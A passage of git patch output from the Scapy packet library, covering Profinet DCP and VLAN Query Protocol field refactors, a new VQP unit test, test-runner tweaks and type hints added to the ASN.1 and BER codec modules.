+ XIntField, + XShortField, +) # minimum packet is 60 bytes.. 14 bytes are Ether() MIN_PACKET_LENGTH = 44 @@ -539,13 +553,21 @@ class ProfinetDCP(Packet): BLOCK_QUALIFIERS), lambda pkt: pkt.service_id == 4 and pkt.service_type == 0), - # Name Of Station - ConditionalField(StrLenField("name_of_station", "et200sp", - length_from=lambda x: x.dcp_block_length - 2), - lambda pkt: pkt.service_id == 4 and - pkt.service_type == 0 and pkt.option == 2 and - pkt.sub_option == 2), - + # (Common) Name Of Station + ConditionalField( + MultipleTypeField( + [ + (StrLenField("name_of_station", "et200sp", + length_from=lambda x: x.dcp_block_length - 2), + lambda pkt: pkt.service_id == 4), + ], + StrLenField("name_of_station", "et200sp", + length_from=lambda x: x.dcp_block_length), + ), + lambda pkt: pkt.service_type == 0 and pkt.option == 2 and + pkt.sub_option == 2 + ), + # DCP SET REQUEST # # MAC ConditionalField(MACField("mac", "00:00:00:00:00:00"), lambda pkt: pkt.service_id == 4 and @@ -566,12 +588,7 @@ class ProfinetDCP(Packet): pkt.sub_option == 2), # DCP IDENTIFY REQUEST # - # Name of station - ConditionalField(StrLenField("name_of_station", "et200sp", - length_from=lambda x: x.dcp_block_length), - lambda pkt: pkt.service_id == 5 and - pkt.service_type == 0 and pkt.option == 2 and - pkt.sub_option == 2), + # Name of station (handled above) # Alias name ConditionalField(StrLenField("alias_name", "et200sp", diff --git a/scapy/contrib/vqp.py b/scapy/contrib/vqp.py index 9bc5a7503c1..5d4476fb731 100644 --- a/scapy/contrib/vqp.py +++ b/scapy/contrib/vqp.py @@ -15,11 +15,18 @@ # scapy.contrib.description = VLAN Query Protocol # scapy.contrib.status = loads -import struct - -from scapy.packet import Packet, bind_layers -from scapy.fields import ByteEnumField, ByteField, ConditionalField, \ - FieldLenField, IntEnumField, IntField, IPField, MACField, StrLenField +from scapy.packet import Packet, bind_layers, bind_bottom_up +from scapy.fields import ( + ByteEnumField, + ByteField, + FieldLenField, + IPField, + IntEnumField, + IntField, + MACField, + MultipleTypeField, + StrLenField, +) from scapy.layers.inet import UDP @@ -51,26 +58,22 @@ class VQPEntry(Packet): 3078: "ReqMACAddress", 3079: "unknown", 3080: "ResMACAddress" }), - FieldLenField("len", None), - ConditionalField(IPField("datatom", "0.0.0.0"), - lambda p: p.datatype == 3073), - ConditionalField(MACField("data", "00:00:00:00:00:00"), - lambda p: p.datatype == 3078), - ConditionalField(MACField("data", "00:00:00:00:00:00"), - lambda p: p.datatype == 3080), - ConditionalField(StrLenField("data", None, - length_from=lambda p: p.len), - lambda p: p.datatype not in [3073, 3078, 3080]), + FieldLenField("len", None, length_of="data", fmt="H"), + MultipleTypeField( + [ + (IPField("data", "0.0.0.0"), + lambda p: p.datatype == 3073), + (MACField("data", "00:00:00:00:00:00"), + lambda p: p.datatype in [3078, 3080]), + ], + StrLenField("data", None, length_from=lambda p: p.len) + ) ] - def post_build(self, p, pay): - if self.len is None: - tmp_len = len(p.data) - p = p[:2] + struct.pack("!H", tmp_len) + p[4:] - return p +bind_bottom_up(UDP, VQP, sport=1589) +bind_bottom_up(UDP, VQP, dport=1589) +bind_layers(UDP, VQP, sport=1589, dport=1589) -bind_layers(UDP, VQP, sport=1589) -bind_layers(UDP, VQP, dport=1589) bind_layers(VQP, VQPEntry,) bind_layers(VQPEntry, VQPEntry,) diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index 85a217a3998..337c76ff7b9 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -1082,6 +1082,9 @@ def main(): KW_KO.append("not_libpcap") if VERB > 2: print(" " + arrow + " libpcap mode") + elif WINDOWS and not NON_ROOT: + print("ERROR: libpcap is required on Windows for root tests") + raise SystemExit KW_KO.append("disabled") diff --git a/test/contrib/isotp.uts b/test/contrib/isotp.uts index a0d95a03491..786b456a2e5 100644 --- a/test/contrib/isotp.uts +++ b/test/contrib/isotp.uts @@ -1,5 +1,7 @@ % Regression tests for ISOTP +~ vcan_socket + + Configuration ~ conf diff --git a/test/contrib/isotpscan.uts b/test/contrib/isotpscan.uts index 2a8eaf9ee85..f6e17b45351 100644 --- a/test/contrib/isotpscan.uts +++ b/test/contrib/isotpscan.uts @@ -1,6 +1,8 @@ % Regression tests for isotp_scan * Some tests are disabled to lower the CI utilitzation +~ vcan_socket + + Configuration ~ conf diff --git a/test/contrib/vqp.uts b/test/contrib/vqp.uts new file mode 100644 index 00000000000..c4559452ff2 --- /dev/null +++ b/test/contrib/vqp.uts @@ -0,0 +1,21 @@ +% VQP tests + ++ Basic VQP tests + += Build VQP + +pkt = UDP()/VQP(type=2, + seq=15)/VQPEntry(datatype=3073,data="1.2.3.4")/VQPEntry(datatype=3078, + data="AA:AA:AA:AA:AA:AA") + +assert bytes(pkt) == b'\x065\x065\x00&\x00\x00\x01\x02\x00\x02\x00\x00\x00\x0f\x00\x00\x0c\x01\x00\x04\x01\x02\x03\x04\x00\x00\x0c\x06\x00\x06\xaa\xaa\xaa\xaa\xaa\xaa' + += Dissect VQP + +pkt = UDP(b'\x065\x065\x00&\x00\x00\x01\x02\x00\x02\x00\x00\x00\x0f\x00\x00\x0c\x01\x00\x04\x01\x02\x03\x04\x00\x00\x0c\x06\x00\x06\xaa\xaa\xaa\xaa\xaa\xaa') + +assert pkt[VQP].sprintf("%type%") == "responseVLAN" +assert pkt.getlayer(VQPEntry, 1).len == 4 +assert pkt.getlayer(VQPEntry, 1).sprintf("%datatype%") == "clientIPAddress" +assert pkt.getlayer(VQPEntry, 2).len == 6 +assert pkt.getlayer(VQPEntry, 2).sprintf("%datatype%") == "ReqMACAddress" From a708b2f629d1fa4e378e09a45fbca83500e948e5 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Wed, 19 May 2021 02:29:56 +0200 Subject: [PATCH 0590/1632] Type hint: asn1 & ber --- .config/mypy/mypy_enabled.txt | 4 + scapy/asn1/asn1.py | 295 ++++++++++++++------- scapy/asn1/ber.py | 233 +++++++++++++---- scapy/asn1fields.py | 465 +++++++++++++++++++++++++--------- scapy/asn1packet.py | 26 +- scapy/config.py | 3 +- test/contrib/isotpscan.uts | 1 + test/regression.uts | 2 +- 8 files changed, 747 insertions(+), 282 deletions(-) diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index eb008e7787a..79ad20c411b 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -13,7 +13,11 @@ scapy/arch/__init__.py scapy/arch/common.py scapy/arch/linux.py scapy/arch/unix.py +scapy/asn1/asn1.py +scapy/asn1/ber.py scapy/asn1/mib.py +scapy/asn1fields.py +scapy/asn1packet.py scapy/base_classes.py scapy/compat.py scapy/config.py diff --git a/scapy/asn1/asn1.py b/scapy/asn1/asn1.py index 45eea565707..d12e2e96b2a 100644 --- a/scapy/asn1/asn1.py +++ b/scapy/asn1/asn1.py @@ -17,21 +17,47 @@ from scapy.error import Scapy_Exception, warning from scapy.volatile import RandField, RandIP, GeneralizedTime from scapy.utils import Enum_metaclass, EnumElement, binrepr -from scapy.compat import plain_str, chb, orb +from scapy.compat import plain_str, bytes_encode, chb, orb import scapy.modules.six as six from scapy.modules.six.moves import range +from scapy.compat import ( + Any, + AnyStr, + Dict, + Generic, + List, + Optional, + Tuple, + Type, + TypeVar, + Union, + _Generic_metaclass, + cast, + TYPE_CHECKING, +) + +if TYPE_CHECKING: + from scapy.asn1.ber import BERcodec_Object + class RandASN1Object(RandField): def __init__(self, objlist=None): - self.objlist = [ - x._asn1_obj - for x in six.itervalues(ASN1_Class_UNIVERSAL.__rdict__) - if hasattr(x, "_asn1_obj") - ] if objlist is None else objlist + # type: (Optional[List[Type[ASN1_Object[Any]]]]) -> None + if objlist: + self.objlist = objlist + else: + self.objlist = [ + x._asn1_obj + for x in six.itervalues( + ASN1_Class_UNIVERSAL.__rdict__ # type: ignore + ) + if hasattr(x, "_asn1_obj") + ] self.chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" # noqa: E501 def _fix(self, n=0): + # type: (int) -> ASN1_Object[Any] o = random.choice(self.objlist) if issubclass(o, ASN1_INTEGER): return o(int(random.gauss(0, 1000))) @@ -73,57 +99,74 @@ class ASN1_BadTag_Decoding_Error(ASN1_Decoding_Error): class ASN1Codec(EnumElement): def register_stem(cls, stem): + # type: (Type[BERcodec_Object[Any]]) -> None cls._stem = stem def dec(cls, s, context=None): - return cls._stem.dec(s, context=context) + # type: (bytes, Optional[Type[ASN1_Class]]) -> ASN1_Object[Any] + return cls._stem.dec(s, context=context) # type: ignore def safedec(cls, s, context=None): - return cls._stem.safedec(s, context=context) + # type: (bytes, Optional[Type[ASN1_Class]]) -> ASN1_Object[Any] + return cls._stem.safedec(s, context=context) # type: ignore def get_stem(cls): - return cls.stem + # type: () -> type + return cls._stem class ASN1_Codecs_metaclass(Enum_metaclass): element_class = ASN1Codec -class ASN1_Codecs(six.with_metaclass(ASN1_Codecs_metaclass)): - BER = 1 - DER = 2 - PER = 3 - CER = 4 - LWER = 5 - BACnet = 6 - OER = 7 - SER = 8 - XER = 9 +@six.add_metaclass(ASN1_Codecs_metaclass) +class ASN1_Codecs: + BER = cast(ASN1Codec, 1) + DER = cast(ASN1Codec, 2) + PER = cast(ASN1Codec, 3) + CER = cast(ASN1Codec, 4) + LWER = cast(ASN1Codec, 5) + BACnet = cast(ASN1Codec, 6) + OER = cast(ASN1Codec, 7) + SER = cast(ASN1Codec, 8) + XER = cast(ASN1Codec, 9) class ASN1Tag(EnumElement): - def __init__(self, key, value, context=None, codec=None): + def __init__(self, + key, # type: str + value, # type: int + context=None, # type: Optional[Type[ASN1_Class]] + codec=None # type: Optional[Dict[ASN1Codec, Type[BERcodec_Object[Any]]]] # noqa: E501 + ): + # type: (...) -> None EnumElement.__init__(self, key, value) - self._context = context + # populated by the metaclass + self.context = context # type: Type[ASN1_Class] # type: ignore if codec is None: codec = {} self._codec = codec def clone(self): # not a real deep copy. self.codec is shared - return self.__class__(self._key, self._value, self._context, self._codec) # noqa: E501 + # type: () -> Any + return self.__class__(self._key, self._value, self.context, self._codec) # noqa: E501 def register_asn1_object(self, asn1obj): + # type: (Type[ASN1_Object[Any]]) -> None self._asn1_obj = asn1obj def asn1_object(self, val): + # type: (Any) -> ASN1_Object[Any] if hasattr(self, "_asn1_obj"): return self._asn1_obj(val) raise ASN1_Error("%r does not have any assigned ASN1 object" % self) def register(self, codecnum, codec): + # type: (ASN1Codec, Type[BERcodec_Object[Any]]) -> None self._codec[codecnum] = codec def get_codec(self, codec): + # type: (Any) -> Type[BERcodec_Object[Any]] try: c = self._codec[codec] except KeyError: @@ -134,7 +177,13 @@ def get_codec(self, codec): class ASN1_Class_metaclass(Enum_metaclass): element_class = ASN1Tag - def __new__(cls, name, bases, dct): # XXX factorise a bit with Enum_metaclass.__new__() # noqa: E501 + # XXX factorise a bit with Enum_metaclass.__new__() + def __new__(cls, # type: ignore + name, # type: str + bases, # type: Tuple[type, ...] + dct # type: Dict[str, Any] + ): + # type: (...) -> Type[ASN1_Class] for b in bases: for k, v in six.iteritems(b.__dict__): if k not in dct and isinstance(v, ASN1Tag): @@ -150,108 +199,136 @@ def __new__(cls, name, bases, dct): # XXX factorise a bit with Enum_metaclass._ rdict[v] = v dct["__rdict__"] = rdict - cls = type.__new__(cls, name, bases, dct) - for v in six.itervalues(cls.__dict__): + ncls = type.__new__(cls, name, bases, dct) # type: Type[ASN1_Class] + for v in six.itervalues(ncls.__dict__): if isinstance(v, ASN1Tag): - v.context = cls # overwrite ASN1Tag contexts, even cloned ones - return cls + # overwrite ASN1Tag contexts, even cloned ones + v.context = ncls + return ncls -class ASN1_Class(six.with_metaclass(ASN1_Class_metaclass)): +@six.add_metaclass(ASN1_Class_metaclass) +class ASN1_Class: pass class ASN1_Class_UNIVERSAL(ASN1_Class): name = "UNIVERSAL" - ERROR = -3 - RAW = -2 - NONE = -1 - ANY = 0 - BOOLEAN = 1 - INTEGER = 2 - BIT_STRING = 3 - STRING = 4 - NULL = 5 - OID = 6 - OBJECT_DESCRIPTOR = 7 - EXTERNAL = 8 - REAL = 9 - ENUMERATED = 10 - EMBEDDED_PDF = 11 - UTF8_STRING = 12 - RELATIVE_OID = 13 - SEQUENCE = 16 | 0x20 # constructed encoding - SET = 17 | 0x20 # constructed encoding - NUMERIC_STRING = 18 - PRINTABLE_STRING = 19 - T61_STRING = 20 # aka TELETEX_STRING - VIDEOTEX_STRING = 21 - IA5_STRING = 22 - UTC_TIME = 23 - GENERALIZED_TIME = 24 - GRAPHIC_STRING = 25 - ISO646_STRING = 26 # aka VISIBLE_STRING - GENERAL_STRING = 27 - UNIVERSAL_STRING = 28 - CHAR_STRING = 29 - BMP_STRING = 30 - IPADDRESS = 0 | 0x40 # application-specific encoding - COUNTER32 = 1 | 0x40 # application-specific encoding - GAUGE32 = 2 | 0x40 # application-specific encoding - TIME_TICKS = 3 | 0x40 # application-specific encoding - - -class ASN1_Object_metaclass(type): - def __new__(cls, name, bases, dct): - c = super(ASN1_Object_metaclass, cls).__new__(cls, name, bases, dct) + # Those casts are made so that MyPy understands what the + # metaclass does in the background. + ERROR = cast(ASN1Tag, -3) + RAW = cast(ASN1Tag, -2) + NONE = cast(ASN1Tag, -1) + ANY = cast(ASN1Tag, 0) + BOOLEAN = cast(ASN1Tag, 1) + INTEGER = cast(ASN1Tag, 2) + BIT_STRING = cast(ASN1Tag, 3) + STRING = cast(ASN1Tag, 4) + NULL = cast(ASN1Tag, 5) + OID = cast(ASN1Tag, 6) + OBJECT_DESCRIPTOR = cast(ASN1Tag, 7) + EXTERNAL = cast(ASN1Tag, 8) + REAL = cast(ASN1Tag, 9) + ENUMERATED = cast(ASN1Tag, 10) + EMBEDDED_PDF = cast(ASN1Tag, 11) + UTF8_STRING = cast(ASN1Tag, 12) + RELATIVE_OID = cast(ASN1Tag, 13) + SEQUENCE = cast(ASN1Tag, 16 | 0x20) # constructed encoding + SET = cast(ASN1Tag, 17 | 0x20) # constructed encoding + NUMERIC_STRING = cast(ASN1Tag, 18) + PRINTABLE_STRING = cast(ASN1Tag, 19) + T61_STRING = cast(ASN1Tag, 20) # aka TELETEX_STRING + VIDEOTEX_STRING = cast(ASN1Tag, 21) + IA5_STRING = cast(ASN1Tag, 22) + UTC_TIME = cast(ASN1Tag, 23) + GENERALIZED_TIME = cast(ASN1Tag, 24) + GRAPHIC_STRING = cast(ASN1Tag, 25) + ISO646_STRING = cast(ASN1Tag, 26) # aka VISIBLE_STRING + GENERAL_STRING = cast(ASN1Tag, 27) + UNIVERSAL_STRING = cast(ASN1Tag, 28) + CHAR_STRING = cast(ASN1Tag, 29) + BMP_STRING = cast(ASN1Tag, 30) + IPADDRESS = cast(ASN1Tag, 0 | 0x40) # application-specific encoding + COUNTER32 = cast(ASN1Tag, 1 | 0x40) # application-specific encoding + GAUGE32 = cast(ASN1Tag, 2 | 0x40) # application-specific encoding + TIME_TICKS = cast(ASN1Tag, 3 | 0x40) # application-specific encoding + + +class ASN1_Object_metaclass(_Generic_metaclass): + def __new__(cls, # type: ignore + name, # type: str + bases, # type: Tuple[type, ...] + dct # type: Dict[str, Any] + ): + # type: (...) -> Type[ASN1_Object[Any]] + c = super(ASN1_Object_metaclass, cls).__new__( + cls, name, bases, dct + ) # type: Type[ASN1_Object[Any]] try: c.tag.register_asn1_object(c) except Exception: - warning("Error registering %r for %r" % (c.tag, c.codec)) + warning("Error registering %r" % c.tag) return c -class ASN1_Object(six.with_metaclass(ASN1_Object_metaclass)): +_K = TypeVar('_K') + + +@six.add_metaclass(ASN1_Object_metaclass) +class ASN1_Object(Generic[_K]): tag = ASN1_Class_UNIVERSAL.ANY def __init__(self, val): + # type: (_K) -> None self.val = val def enc(self, codec): + # type: (Any) -> bytes return self.tag.get_codec(codec).enc(self.val) def __repr__(self): + # type: () -> str return "<%s[%r]>" % (self.__dict__.get("name", self.__class__.__name__), self.val) # noqa: E501 def __str__(self): - return self.enc(conf.ASN1_default_codec) + # type: () -> str + return plain_str(self.enc(conf.ASN1_default_codec)) def __bytes__(self): + # type: () -> bytes return self.enc(conf.ASN1_default_codec) def strshow(self, lvl=0): + # type: (int) -> str return (" " * lvl) + repr(self) + "\n" def show(self, lvl=0): + # type: (int) -> None print(self.strshow(lvl)) def __eq__(self, other): - return self.val == other + # type: (Any) -> bool + return bool(self.val == other) def __lt__(self, other): - return self.val < other + # type: (Any) -> bool + return bool(self.val < other) def __le__(self, other): - return self.val <= other + # type: (Any) -> bool + return bool(self.val <= other) def __gt__(self, other): - return self.val > other + # type: (Any) -> bool + return bool(self.val > other) def __ge__(self, other): - return self.val >= other + # type: (Any) -> bool + return bool(self.val >= other) def __ne__(self, other): - return self.val != other + # type: (Any) -> bool + return bool(self.val != other) ####################### @@ -260,27 +337,38 @@ def __ne__(self, other): # on the whole, we order the classes by ASN1_Class_UNIVERSAL tag value -class ASN1_DECODING_ERROR(ASN1_Object): +class _ASN1_ERROR(ASN1_Object[Union[bytes, ASN1_Object[Any]]]): + pass + + +class ASN1_DECODING_ERROR(_ASN1_ERROR): tag = ASN1_Class_UNIVERSAL.ERROR def __init__(self, val, exc=None): + # type: (Union[bytes, ASN1_Object[Any]], Optional[Exception]) -> None ASN1_Object.__init__(self, val) self.exc = exc def __repr__(self): - return "<%s[%r]{{%r}}>" % (self.__dict__.get("name", self.__class__.__name__), # noqa: E501 - self.val, self.exc.args[0]) + # type: () -> str + return "<%s[%r]{{%r}}>" % ( + self.__dict__.get("name", self.__class__.__name__), + self.val, + self.exc and self.exc.args[0] or "" + ) def enc(self, codec): + # type: (Any) -> bytes if isinstance(self.val, ASN1_Object): return self.val.enc(codec) return self.val -class ASN1_force(ASN1_Object): +class ASN1_force(_ASN1_ERROR): tag = ASN1_Class_UNIVERSAL.RAW def enc(self, codec): + # type: (Any) -> bytes if isinstance(self.val, ASN1_Object): return self.val.enc(codec) return self.val @@ -290,10 +378,11 @@ class ASN1_BADTAG(ASN1_force): pass -class ASN1_INTEGER(ASN1_Object): +class ASN1_INTEGER(ASN1_Object[int]): tag = ASN1_Class_UNIVERSAL.INTEGER def __repr__(self): + # type: () -> str h = hex(self.val) if h[-1] == "L": h = h[:-1] @@ -311,10 +400,11 @@ class ASN1_BOOLEAN(ASN1_INTEGER): # BER: 0 means False, anything else means True def __repr__(self): + # type: () -> str return '%s %s' % (not (self.val == 0), ASN1_Object.__repr__(self)) -class ASN1_BIT_STRING(ASN1_Object): +class ASN1_BIT_STRING(ASN1_Object[str]): """ ASN1_BIT_STRING values are bit strings like "011101". A zero-bit padded readable string is provided nonetheless, @@ -323,12 +413,14 @@ class ASN1_BIT_STRING(ASN1_Object): tag = ASN1_Class_UNIVERSAL.BIT_STRING def __init__(self, val, readable=False): + # type: (AnyStr, bool) -> None if not readable: - self.val = val + self.val = cast(str, val) # type: ignore else: - self.val_readable = val + self.val_readable = cast(bytes, val) # type: ignore def __setattr__(self, name, value): + # type: (str, str) -> None if name == "val_readable": if isinstance(value, (str, bytes)): val = "".join(binrepr(orb(x)).zfill(8) for x in value) @@ -336,7 +428,7 @@ def __setattr__(self, name, value): warning("Invalid val: should be bytes") val = "" object.__setattr__(self, "val", val) - object.__setattr__(self, name, value) + object.__setattr__(self, name, bytes_encode(value)) object.__setattr__(self, "unused_bits", 0) elif name == "val": value = plain_str(value) @@ -366,42 +458,46 @@ def __setattr__(self, name, value): object.__setattr__(self, name, value) def __repr__(self): + # type: () -> str s = self.val_readable if len(s) > 16: s = s[:10] + b"..." + s[-10:] v = self.val if len(v) > 20: v = v[:10] + "..." + v[-10:] - return "<%s[%s]=%s (%d unused bit%s)>" % ( + return "<%s[%s]=%r (%d unused bit%s)>" % ( self.__dict__.get("name", self.__class__.__name__), v, s, - self.unused_bits, - "s" if self.unused_bits > 1 else "" + self.unused_bits, # type: ignore + "s" if self.unused_bits > 1 else "" # type: ignore ) -class ASN1_STRING(ASN1_Object): +class ASN1_STRING(ASN1_Object[str]): tag = ASN1_Class_UNIVERSAL.STRING -class ASN1_NULL(ASN1_Object): +class ASN1_NULL(ASN1_Object[None]): tag = ASN1_Class_UNIVERSAL.NULL def __repr__(self): + # type: () -> str return ASN1_Object.__repr__(self) -class ASN1_OID(ASN1_Object): +class ASN1_OID(ASN1_Object[str]): tag = ASN1_Class_UNIVERSAL.OID def __init__(self, val): + # type: (str) -> None val = plain_str(val) val = conf.mib._oid(val) ASN1_Object.__init__(self, val) self.oidname = conf.mib._oidname(val) def __repr__(self): + # type: () -> str return "<%s[%r]>" % (self.__dict__.get("name", self.__class__.__name__), self.oidname) # noqa: E501 @@ -436,10 +532,8 @@ class ASN1_IA5_STRING(ASN1_STRING): class ASN1_UTC_TIME(ASN1_STRING): tag = ASN1_Class_UNIVERSAL.UTC_TIME - def __init__(self, val): - ASN1_STRING.__init__(self, val) - def __setattr__(self, name, value): + # type: (str, str) -> None if isinstance(value, bytes): value = plain_str(value) if name == "val": @@ -465,7 +559,11 @@ def __setattr__(self, name, value): ASN1_STRING.__setattr__(self, name, value) def __repr__(self): - return "%s %s" % (self.pretty_time, ASN1_STRING.__repr__(self)) + # type: () -> str + return "%s %s" % ( + self.pretty_time, # type: ignore + super(ASN1_UTC_TIME, self).__repr__() + ) class ASN1_GENERALIZED_TIME(ASN1_UTC_TIME): @@ -484,10 +582,11 @@ class ASN1_BMP_STRING(ASN1_STRING): tag = ASN1_Class_UNIVERSAL.BMP_STRING -class ASN1_SEQUENCE(ASN1_Object): +class ASN1_SEQUENCE(ASN1_Object[List[Any]]): tag = ASN1_Class_UNIVERSAL.SEQUENCE def strshow(self, lvl=0): + # type: (int) -> str s = (" " * lvl) + ("# %s:" % self.__class__.__name__) + "\n" for o in self.val: s += o.strshow(lvl=lvl + 1) diff --git a/scapy/asn1/ber.py b/scapy/asn1/ber.py index d6c6b1498c1..014815498b9 100644 --- a/scapy/asn1/ber.py +++ b/scapy/asn1/ber.py @@ -13,11 +13,36 @@ from scapy.error import warning from scapy.compat import chb, orb, bytes_encode from scapy.utils import binrepr, inet_aton, inet_ntoa -from scapy.asn1.asn1 import ASN1_Decoding_Error, ASN1_Encoding_Error, \ - ASN1_BadTag_Decoding_Error, ASN1_Codecs, ASN1_Class_UNIVERSAL, \ - ASN1_Error, ASN1_DECODING_ERROR, ASN1_BADTAG +from scapy.asn1.asn1 import ( + ASN1_BADTAG, + ASN1_BadTag_Decoding_Error, + ASN1_Class, + ASN1_Class_UNIVERSAL, + ASN1_Codecs, + ASN1_DECODING_ERROR, + ASN1_Decoding_Error, + ASN1_Encoding_Error, + ASN1_Error, + ASN1_Object, + _ASN1_ERROR, +) from scapy.modules import six +from scapy.compat import ( + Any, + AnyStr, + Dict, + Generic, + List, + Optional, + Tuple, + Type, + TypeVar, + Union, + _Generic_metaclass, + cast, +) + ################## # BER encoding # ################## @@ -31,14 +56,20 @@ class BER_Exception(Exception): class BER_Encoding_Error(ASN1_Encoding_Error): - def __init__(self, msg, encoded=None, remaining=None): + def __init__(self, + msg, # type: str + encoded=None, # type: Optional[Union[BERcodec_Object[Any], str]] # noqa: E501 + remaining=b"" # type: bytes + ): + # type: (...) -> None Exception.__init__(self, msg) self.remaining = remaining self.encoded = encoded def __str__(self): + # type: () -> str s = Exception.__str__(self) - if isinstance(self.encoded, BERcodec_Object): + if isinstance(self.encoded, ASN1_Object): s += "\n### Already encoded ###\n%s" % self.encoded.strshow() else: s += "\n### Already encoded ###\n%r" % self.encoded @@ -47,14 +78,20 @@ def __str__(self): class BER_Decoding_Error(ASN1_Decoding_Error): - def __init__(self, msg, decoded=None, remaining=None): + def __init__(self, + msg, # type: str + decoded=None, # type: Optional[Any] + remaining=b"" # type: bytes + ): + # type: (...) -> None Exception.__init__(self, msg) self.remaining = remaining self.decoded = decoded def __str__(self): + # type: () -> str s = Exception.__str__(self) - if isinstance(self.decoded, BERcodec_Object): + if isinstance(self.decoded, ASN1_Object): s += "\n### Already decoded ###\n%s" % self.decoded.strshow() else: s += "\n### Already decoded ###\n%r" % self.decoded @@ -68,6 +105,7 @@ class BER_BadTag_Decoding_Error(BER_Decoding_Error, def BER_len_enc(ll, size=0): + # type: (int, int) -> bytes if ll <= 127 and size == 0: return chb(ll) s = b"" @@ -84,6 +122,7 @@ def BER_len_enc(ll, size=0): def BER_len_dec(s): + # type: (bytes) -> Tuple[int, bytes] tmp_len = orb(s[0]) if not tmp_len & 0x80: return tmp_len, s[1:] @@ -102,7 +141,8 @@ def BER_len_dec(s): def BER_num_enc(ll, size=1): - x = [] + # type: (int, int) -> bytes + x = [] # type: List[int] while ll or size > 0: x.insert(0, ll & 0x7f) if len(x) > 1: @@ -113,6 +153,7 @@ def BER_num_enc(ll, size=1): def BER_num_dec(s, cls_id=0): + # type: (bytes, int) -> Tuple[int, bytes] if len(s) == 0: raise BER_Decoding_Error("BER_num_dec: got empty string", remaining=s) x = cls_id @@ -129,6 +170,7 @@ def BER_num_dec(s, cls_id=0): def BER_id_dec(s): + # type: (bytes) -> Tuple[int, bytes] # This returns the tag ALONG WITH THE PADDED CLASS+CONSTRUCTIVE INFO. # Let's recall that bits 8-7 from the first byte of the tag encode # the class information, while bit 6 means primitive or constructive. @@ -155,6 +197,7 @@ def BER_id_dec(s): def BER_id_enc(n): + # type: (int) -> bytes if n < 256: # low-tag-number return chb(n) @@ -170,8 +213,13 @@ def BER_id_enc(n): # The functions below provide implicit and explicit tagging support. -def BER_tagging_dec(s, hidden_tag=None, implicit_tag=None, - explicit_tag=None, safe=False): +def BER_tagging_dec(s, # type: bytes + hidden_tag=None, # type: Optional[Any] + implicit_tag=None, # type: Optional[int] + explicit_tag=None, # type: Optional[int] + safe=False, # type: Optional[bool] + ): + # type: (...) -> Tuple[Optional[int], bytes] # We output the 'real_tag' if it is different from the (im|ex)plicit_tag. real_tag = None if len(s) > 0: @@ -196,6 +244,7 @@ def BER_tagging_dec(s, hidden_tag=None, implicit_tag=None, def BER_tagging_enc(s, implicit_tag=None, explicit_tag=None): + # type: (bytes, Optional[int], Optional[int]) -> bytes if len(s) > 0: if implicit_tag is not None: s = BER_id_enc(implicit_tag) + s[1:] @@ -206,9 +255,16 @@ def BER_tagging_enc(s, implicit_tag=None, explicit_tag=None): # [ BER classes ] # -class BERcodec_metaclass(type): - def __new__(cls, name, bases, dct): - c = super(BERcodec_metaclass, cls).__new__(cls, name, bases, dct) +class BERcodec_metaclass(_Generic_metaclass): + def __new__(cls, # type: ignore + name, # type: str + bases, # type: Tuple[type, ...] + dct # type: Dict[str, Any] + ): + # type: (...) -> Type[BERcodec_Object[Any]] + c = super(BERcodec_metaclass, cls).__new__( + cls, name, bases, dct + ) # type: Type[BERcodec_Object[Any]] try: c.tag.register(c.codec, c) except Exception: @@ -216,16 +272,22 @@ def __new__(cls, name, bases, dct): return c -class BERcodec_Object(six.with_metaclass(BERcodec_metaclass)): +_K = TypeVar('_K') + + +@six.add_metaclass(BERcodec_metaclass) +class BERcodec_Object(Generic[_K]): codec = ASN1_Codecs.BER tag = ASN1_Class_UNIVERSAL.ANY @classmethod def asn1_object(cls, val): + # type: (_K) -> ASN1_Object[_K] return cls.tag.asn1_object(val) @classmethod def check_string(cls, s): + # type: (bytes) -> None if not s: raise BER_Decoding_Error( "%s: Got empty object while expecting tag %r" % @@ -234,6 +296,7 @@ def check_string(cls, s): @classmethod def check_type(cls, s): + # type: (bytes) -> bytes cls.check_string(s) tag, remainder = BER_id_dec(s) if not isinstance(tag, int) or cls.tag != tag: @@ -245,6 +308,7 @@ def check_type(cls, s): @classmethod def check_type_get_len(cls, s): + # type: (bytes) -> Tuple[int, bytes] s2 = cls.check_type(s) if not s2: raise BER_Decoding_Error("%s: No bytes while expecting a length" % @@ -253,6 +317,7 @@ def check_type_get_len(cls, s): @classmethod def check_type_check_len(cls, s): + # type: (bytes) -> Tuple[int, bytes, bytes] l, s3 = cls.check_type_get_len(s) if len(s3) < l: raise BER_Decoding_Error("%s: Got %i bytes while expecting %i" % @@ -260,48 +325,72 @@ def check_type_check_len(cls, s): return l, s3[:l], s3[l:] @classmethod - def do_dec(cls, s, context=None, safe=False): - if context is None: - context = cls.tag.context + def do_dec(cls, + s, # type: bytes + context=None, # type: Optional[Type[ASN1_Class]] + safe=False # type: bool + ): + # type: (...) -> Tuple[ASN1_Object[Any], bytes] + if context is not None: + _context = context + else: + _context = cls.tag.context cls.check_string(s) p, remainder = BER_id_dec(s) - if p not in context: + if p not in _context: # type: ignore t = s if len(t) > 18: t = t[:15] + b"..." raise BER_Decoding_Error("Unknown prefix [%02x] for [%r]" % (p, t), remaining=s) - codec = context[p].get_codec(ASN1_Codecs.BER) + tag = _context[p] # type: ignore + codec = cast('Type[BERcodec_Object[_K]]', + tag.get_codec(ASN1_Codecs.BER)) if codec == BERcodec_Object: # Value type defined as Unknown l, s = BER_num_dec(remainder) return ASN1_BADTAG(s[:l]), s[l:] - return codec.dec(s, context, safe) + return codec.dec(s, _context, safe) @classmethod - def dec(cls, s, context=None, safe=False): + def dec(cls, + s, # type: bytes + context=None, # type: Optional[Type[ASN1_Class]] + safe=False, # type: bool + ): + # type: (...) -> Tuple[Union[_ASN1_ERROR, ASN1_Object[_K]], bytes] if not safe: return cls.do_dec(s, context, safe) try: return cls.do_dec(s, context, safe) except BER_BadTag_Decoding_Error as e: - o, remain = BERcodec_Object.dec(e.remaining, context, safe) + o, remain = BERcodec_Object.dec( + e.remaining, context, safe + ) # type: Tuple[ASN1_Object[Any], bytes] return ASN1_BADTAG(o), remain except BER_Decoding_Error as e: - return ASN1_DECODING_ERROR(s, exc=e), "" + return 